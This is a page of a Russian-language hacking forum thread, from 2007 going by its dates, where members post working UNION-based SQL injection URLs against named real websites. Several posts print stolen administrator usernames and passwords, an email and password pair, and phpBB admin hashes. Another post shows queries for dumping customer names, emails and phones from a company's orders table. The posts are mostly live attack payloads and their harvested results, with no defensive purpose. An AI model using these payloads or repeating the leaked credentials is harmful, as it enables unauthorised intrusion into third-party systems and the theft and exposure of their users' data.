SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 87 of 798
  1. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3/*
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,table_name,3+from+information_schema.tables+limit+37,1/*
http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(id,char(58),namek,char(58),t),3+from+tom_tabless+limit+0,1/*
     
    #1721 Grey, 7 Apr 2007
    2 people like this.
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    :)
     
    #1722 n0ne, 7 Apr 2007
    2 people like this.
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.photostars.ru/news/event.htm?id=63'+union+select+1,2,3,4,concat(user,char(58),password),6,7+from+mysql.user/* прокручиваем в самый низ
     
    #1723 }{0TT@БЬ)Ч, 7 Apr 2007
    2 people like this.
  4. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.latinoreview.com/news.php?id=-1369'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,user(),database()/*
     
    #1724 valiko, 7 Apr 2007
    3 people like this.
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    :)
     
    #1725 n0ne, 7 Apr 2007
    1 person likes this.
  6. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://www.arabmonitor.info/news/dettaglio.php?idnews=-7070+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+users/*
    Code:
    http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,password,3,4,5,6,7,8,9,10+from+mysql.user/*
    хмм, страно =\ не могу вывести юзверя, зы: много пивка выпил наверно =)
     
    #1726 zl0ba, 8 Apr 2007
    1 person likes this.
  7. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2zl0ba

     
    #1727 kamaz, 8 Apr 2007
    2 people like this.
  8. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    И второй сайт:
     
    #1728 kamaz, 8 Apr 2007
    4 people like this.
  9. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.sport.is

    Code:
    http://www.sport.is/fullfrettir.php?idnews=-4936+union+select+1,2,concat(name,0x3a,password),4+from+users/*&idcat=10
    admin:markme [​IMG]
     
    #1729 zl0ba, 8 Apr 2007
  10. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.daoiststudies.org

    Code:
    http://www.daoiststudies.org/scholars.php?cmd=list&userid=-863+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+members/*

    [email protected]:queriooz2 [​IMG]
     
    #1730 zl0ba, 8 Apr 2007
    1 person likes this.
  11. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    =\\ http://www.kuraraydental.com/
    Inj:
    Админку не искал. Погонять по лимиту, можно выцепить других юзеров.

    admin:chris-ko
     
    #1731 .Slip, 8 Apr 2007
    Last edited: 8 Apr 2007
    1 person likes this.
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    [sL1p], _ttp://radata.com я выложил на предыдущей странице :Р
     
    #1732 n0ne, 8 Apr 2007
  13. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    чет накаких интересны таблиц ненашёл
     
    #1733 VampiRUS, 8 Apr 2007
  14. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.realhit.ru/?page=news&id=-1+union+select+null,version(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,database(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,user(),null/*
     
    #1734 _GaLs_, 8 Apr 2007
    2 people like this.
  15. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    У меня всё прекрасно выводит:
    Code:
    _http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/*
    Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
     
    #1735 ShadOS, 8 Apr 2007
    Last edited: 8 Apr 2007
  16. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    mafiaclub.ru
    Code:
    http://www.mafiaclub.ru/gallery/user.php?gid=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb_users+limit+1,1/*
    phpbb хеш админа
    там 5 админов, перебор лимитами.
     
    #1736 n1†R0x, 8 Apr 2007
    Last edited: 8 Apr 2007
    3 people like this.
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,4,5,6,7+from+orders/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(name,char(58),email,char(58),phone),5,6,7+from+orders/*
     
    #1737 Grey, 8 Apr 2007
    2 people like this.
  18. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Такая же трабла.
     
    #1738 Ksander, 8 Apr 2007
    2 people like this.
  19. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
     
    #1739 _GaLs_, 8 Apr 2007
  20. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Территория
    [​IMG]
    ===============
    www.it-territory.ru
    ===============
    Code:
    http://www.it-territory.ru./index.php?obj=press&id=136+union+select+1,version(),3,4/*
    Список статей, самый низ
    Кто достанет нам новый апдейт Территории?:)
     
    #1740 banned, 8 Apr 2007
(You must log in or sign up to post here.)
Page 87 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.